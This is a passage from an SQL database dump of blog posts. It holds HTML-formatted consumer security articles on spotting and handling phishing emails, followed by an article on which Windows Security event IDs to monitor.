pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Claiming your account will be deactivated unless you act immediately.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Warning of potential legal action.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Offering time-sensitive deals that feel “too good to be true.”</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Legitimate companies rarely use scare tactics. Take a moment to analyze the message before acting.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">c) Suspicious Links or Attachments</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Hover over any links in the email before clicking them to preview the URL. Watch for mismatched addresses, unfamiliar sites, or those designed to mimic trusted domains. Similarly, avoid downloading unexpected attachments, as they could contain malware.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">d) Poor Grammar and Spelling</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Many phishing emails feature glaring spelling or grammatical errors. While some scams are getting more sophisticated, sloppy language remains a telltale sign of a phishing attempt. Legitimate companies typically have professional proofreading standards.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">e) Requests for Sensitive Information</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">No reputable organization will ask for sensitive personal details, such as your passwords, Social Security numbers, or credit card information, via email. If an email requests such data, it’s almost always a red flag.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Immediate Steps to Take If You Suspect a Phishing Email</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you receive an email that seems suspicious, don’t panic. Follow these practical steps to protect yourself:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">a) Don’t Click Links or Download Attachments</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even if the email looks legitimate, refrain from interacting with any links or downloads. Phishing scams often rely on malicious links—designed to steal your credentials—or harmful attachments programmed to install malware on your device.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">b) Don’t Reply to the Email</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Replying to a phishing email can confirm your email address to scammers, opening the door to further phishing attempts. Ignore suspicious messages entirely.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">c) Report the Email</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">If it’s a work email, notify your IT department immediately so they can assess the risk and warn other employees.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">For personal emails, use your email provider’s built-in reporting feature to flag phishing attempts.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">d) Mark It as Spam or Junk</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Most email clients—like Gmail or Outlook—offer the ability to mark emails as spam. Doing so helps improve spam filters and reduces the likelihood of future phishing attempts landing in your inbox.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Additional Steps to Bolster Your Security</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Beyond simply identifying and reporting phishing emails, you should take proactive measures to secure your devices and accounts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">a) Scan Your Devices for Malware</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you suspect you may have interacted with a phishing email, run a full malware scan on your device immediately. Use reputable antivirus software, such as Norton or Malwarebytes, to detect and remove any harmful programs.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">b) Change Compromised Passwords</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If there’s any chance your account credentials have been exposed:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use strong, unique passwords for each account.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid predictable passwords that include personal information, like your name or birthdate.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Implement a password manager like LastPass or Dashlane to securely store and generate robust passwords.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">c) Enable Two-Factor Authentication (2FA)</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Two-factor authentication adds an extra layer of security by requiring a second form of verification, such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">A randomly generated code delivered to your phone or email.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Biometric authentication, like a fingerprint reader or facial recognition.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With 2FA enabled, even cybercriminals who obtain your password will struggle to access your account.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">d) Keep Software Updated</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Regularly update your operating system, email software, and antivirus tools to ensure they’re equipped with the latest security patches. Outdated software can leave you vulnerable to new exploits.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Educating Yourself and Others About Phishing</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Preventing phishing attacks is not just an individual responsibility—it’s a collective effort. Stay informed and share what you learn with others.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">a) Stay Updated on Cybersecurity Trends</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Follow cybersecurity blogs for the latest in phishing tactics and prevention.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Subscribe to alerts from trusted tech companies like Google and Microsoft.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Join forums or communities focused on cybersecurity best practices.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">b) Participate in Cybersecurity Training</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Many businesses now offer security training to employees, teaching essential skills such as identifying phishing scams and managing passwords. Even if your workplace doesn’t provide such programs, consider enrolling in an online course to strengthen your knowledge.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">c) Share Your Knowledge</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Help your family, friends, and colleagues stay safe:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Teach children and seniors how to spot phishing attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Share phishing prevention tips on your social media accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Encourage your workplace to host cybersecurity workshops.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The more people are aware of phishing scams and how to prevent them, the harder it becomes for scammers to succeed.</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Takeaways for Preventing Phishing Email Scams</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails remain a prominent security threat, but you can outsmart scammers with careful vigilance and proactive measures:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Always look for red flags like unknown senders, poor grammar, or suspicious links.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Take immediate steps to protect your devices and accounts if you encounter a phishing email.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Stay informed about phishing tactics, and share your knowledge with others.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By following these tips, you not only secure your personal data but also contribute to creating a safer, more secure digital environment.</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:32:31', '2026-01-12 21:41:44', 'Information Security', 'What Should You Do If You Receive a Suspicious Email', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(120, 'The 8 Most Critical Windows Security Event IDs You Need to Monitor', 'the-8-most-critical-windows-security-event-ids-you-need-to-monitor', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When it comes to safeguarding your systems, staying ahead of potential threats is essential. For cybersecurity professionals, one of the most powerful tools available is the <b><strong class=\"font-bold\">Windows Security Log</strong></b>. Properly monitoring and understanding key event IDs in these logs can strengthen your <b><strong class=\"font-bold\">security posture</strong></b> and enhance your overall <b><strong class=\"font-bold\">crypto security</strong></b> protocols.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To help you stay proactive, this guide explores the <b><strong class=\"font-bold\">eight most critical Windows Security event IDs</strong></b> that you should be monitoring, why they matter, and how they can help protect your systems.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitoring Windows Security Event IDs Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Windows Security Log maintains a detailed history of activity occurring within your systems. Key <b><strong class=\"font-bold\">security event IDs</strong></b> can serve as early warning signals for malicious activity or breaches. These fall into two important categories:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Single-occurrence events</strong></b> that may signal malicious actions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Abnormal frequency patterns</strong></b> that could indicate impending or ongoing security threats.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By being proactive with your monitoring, you gain the ability to detect—and defend against—potential issues <i><em class=\"italic\">before</em></i> they escalate.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Let\'s now break down the <b><strong class=\"font-bold\">critical Windows security event IDs</strong></b> you need to track carefully.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Event ID 4624 - Successful Logon</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This event represents every instance when a user successfully logs into your system. While successful logins often seem routine, they can hold valuable insights.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor this Event?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detect unauthorized logins from inactive, restricted, or compromised accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Identify users logging in outside normal hours, which may indicate suspicious behavior.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Find concurrent logins across multiple resources, potentially signaling credential misuse.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Keeping an eye on Event ID 4624 helps ensure no unauthorized user gains access undetected, protecting your <b><strong class=\"font-bold\">crypto security</strong></b> and sensitive data.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Event ID 4625 - Failed Logon</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Failed login attempts may indicate <b><strong class=\"font-bold\">brute-force attacks</strong></b> or other malicious password-guessing behavior.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor this Event?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detect brute-force password attacks on user accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Identify potential dictionary attacks from automated tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Adjust your account lockout policies to avoid suspicious activity attempts.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Monitoring failed logon attempts allows you to mitigate password-related vulnerabilities and improve user account security.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Event ID 4728 - Member Added to Security-Enabled Global Group</h2>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Event ID 4732 - Member Added to Security-Enabled Local Group</h2>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Event ID 4756 - Member Added to Security-Enabled Universal Group</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These event IDs specifically track <b><strong class=\"font-bold\">group membership changes</strong></b>, particularly for security-enabled groups. Unauthorized changes to these groups could lead to privilege escalation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor these Events?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detect unauthorized group membership changes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Scrutinize additions to privileged user groups for possible privilege abuse.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Identify accidental or malicious additions to security-sensitive groups.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By actively tracking these events, you’ll be able to ensure only authorized personnel maintain access to sensitive systems.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Event ID 1102 - Audit Log Cleared</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Clearing system logs might seem purpose-driven, but malicious actors often clear audit logs to cover their tracks after breaching the system.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor this Event?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identify attempts to erase activity records for malicious purposes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Detect unexpected log clearances and investigate further.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Mitigate the risks of unauthorized tampering with your <b><strong class=\"font-bold\">Windows Security Log</strong></b>.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By setting alerts for this event, you can act fast to identify suspicious log-clearing behavior.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Event ID 4740 - User Account Locked Out</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Locked-out accounts can signify a <b><strong class=\"font-bold\">brute-force attack</strong></b> or a user’s accidental oversight. Either way, Event ID 4740 should be consistently monitored to secure your environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor this Event?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identify ongoing brute-force password guessing attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Protect legitimate users from being locked out due to configuration issues.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Account lockouts often signal an attempt to exploit vulnerabilities—make sure to investigate each occurrence.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. Event ID 4663 - Attempt to Access Object</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Event ID 4663 logs unauthorized attempts to <b><strong class=\"font-bold\">access sensitive files or folders</strong></b>, and is critical for protecting data integrity and system confidentiality.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Monitor this Event?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detect any file or folder access attempts that are outside of normal permissions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Prevent unauthorized individuals from compromising sensitive business files.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] 